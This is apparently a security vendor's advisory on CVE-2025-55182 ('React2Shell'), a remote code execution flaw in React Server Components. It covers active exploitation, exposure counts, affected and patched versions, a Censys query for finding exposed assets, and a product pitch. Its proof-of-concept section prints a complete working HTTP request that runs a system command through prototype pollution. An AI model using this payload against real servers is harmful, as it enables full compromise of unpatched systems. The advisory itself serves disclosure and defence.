React2Shell RCE: Patch CVE-2025-55182 Immediately

Critical RCE Flaw “React2Shell” Actively Exploited

On December 3, the web development community was alerted to CVE-2025-55182, a catastrophic unauthenticated remote code execution (RCE) vulnerability in React Server Components (RSC) dubbed “React2Shell.” With a maximum CVSS severity score of 10.0, this flaw poses an immediate and severe threat to countless web applications. The vulnerability is already under active exploitation by state-sponsored threat actors; immediate patching is not just recommended, it is critical.

This is not a theoretical threat; it is a clear and present danger. Within 24 hours of its public disclosure, AWS researchers reported that China-nexus threat actors began exploiting this flaw in the wild. As of December 5, CVE-2025-55182 has been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog, underscoring the urgency for all organizations to assess their exposure and remediate.

Technical Analysis: Insecure Deserialization in RSC

React2Shell stems from an insecure deserialization weakness within the "Flight" protocol, which is fundamental to how React Server Components function. This protocol improperly handles JSON payloads sent to Server Function endpoints. An unauthenticated, remote attacker can send a specially crafted HTTP request containing a malicious payload; this payload exploits the deserialization process to execute arbitrary JavaScript code on the server, granting the attacker full control.

The widespread adoption of frameworks like Next.js, which leverage RSC, combined with the simplicity of triggering the vulnerability, creates a perfect storm for mass exploitation. Any internet-facing server running affected RSC code should be considered vulnerable until proven otherwise.

🚨 Censys on #React2Shell (CVE-2025-55182): We observe ~2.15M exposed web services running Next.js or other RSC-based frameworks—mostly in the U.S. and China. Not all are vulnerable, but active exploitation is underway. Patch now.

Global Impact and Active Exploitation

The attack surface for React2Shell is vast. Security researchers have identified hundreds of thousands of potentially vulnerable instances online:

• Shodan: Over 380,000 assets return the header "Vary: RSC, Next-Router-State-Tree", a strong indicator of RSC usage.
• Censys: Reports approximately 2.15 million exposed web services running Next.js or other RSC-based frameworks.
• Flawtrack Intelligence: Our platform has already detected over 3,500 assets infected with web shells and backdoors in Malaysia alone, confirming that attackers are moving swiftly from initial access to persistence.

State-sponsored groups like Earth Lamia and Jackpot Panda are actively scanning and exploiting this vulnerability, deploying malware shortly after gaining access. The low barrier to entry for exploitation means that less sophisticated actors will soon follow.

Proof of Concept: Exploitation in Action

Multiple proofs of concept (PoC) are now public, demonstrating how trivial it is to exploit this vulnerability. The following HTTP request triggers the RCE by sending a malicious multipart form payload that abuses the server-side logic.

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

This PoC leverages prototype pollution to manipulate the server's execution flow, ultimately calling child_process.execSync to run an arbitrary system command (xcalc in this example).

Vulnerability Breakdown: CVE-2025-55182

Field	Description
CVE-ID	CVE-2025-55182 — CVSS 10 — Assigned by Facebook.
Vulnerability Description	React Server Components (RSC) and related packages improperly deserialize JSON payloads sent to Server Function endpoints. An attacker can supply a crafted payload via HTTP request — without authentication — that causes the server to execute arbitrary JavaScript code, leading to full RCE.
Date of Disclosure	December 3, 2025
Affected Assets	Server‑side applications using React 19.x (RSC) including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Any frameworks that embed these packages, such as Next.js (App Router), React Router RSC preview, Waku, Vite RSC plugin, and RedwoodSDK, are also affected.
Vulnerable Versions	react-server-dom-* packages: 19.0.0, 19.1.0, 19.1.1, 19.2.0. Next.js: versions ≥ 14.3.0-canary.77 and all 15.x/16.x versions using App Router.
Exploitation Status	Actively Exploited. Confirmed by Amazon, CISA, and GreyNoise. China-aligned state-sponsored groups are leveraging this flaw.
Patch Status	Available. React patched to 19.0.1, 19.1.2, 19.2.1. Next.js patched to 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7.

Detection and Mitigation

Immediate action is required to identify and remediate vulnerable systems. Security teams should prioritize scanning their external attack surface for indicators of affected frameworks.

Identifying Exposed Assets

You can use the following advanced search query on platforms like Censys to identify internet-facing services that may be running affected software. This query looks for specific HTTP headers, body content, and favicons associated with RSC and related frameworks.

web.endpoints.http.headers: (key: "Content-Type" and value: "text/x-component") or web.endpoints.http.headers: (key: "Vary" and value: "RSC") or web.software.product:"next.js" or web.endpoints.http.body:{"react-router-dom.js","__WAKU_CLIENT_IMPORT__", "__WAKU_ROUTER_PREFETCH__", "__WAKU_HYDRATE__", "__WAKU_PREFETCHED__","import.meta.viteRsc", "__vite_rsc", "__RWSDK_CONTEXT"
} or web.endpoints.http.html_tags = "<meta name=\"generator\" content=\"Waku\"/>" or web.endpoints.http.favicons.hash_sha256 = "4ec926d579c8540e4eb8e4eff3d0fc9060410ce5218293ddebd9ddb36e76b7e6"

Remediation: Patch Immediately

The only effective mitigation is to update to a patched version. Do not delay.

• React: Upgrade to version 19.0.1, 19.1.2, or 19.2.1.
• Next.js: Upgrade to the latest patched versions, such as 15.0.5, 15.1.9, or higher depending on your branch.

Verify that all dependencies that embed the vulnerable react-server-dom packages are also updated.

Secure Your Attack Surface with Flawtrack

React2Shell demonstrates the critical need for continuous attack surface monitoring. A vulnerability can go from disclosure to mass exploitation in less than a day; you cannot afford to be unaware of your exposure.

The Flawtrack platform provides comprehensive visibility into your external assets, identifying vulnerable software and misconfigurations before attackers can exploit them. We help you cut through the noise and prioritize critical risks like CVE-2025-55182.

Contact Flawtrack for a full analysis of your attack surface and protect your organization from the next critical threat.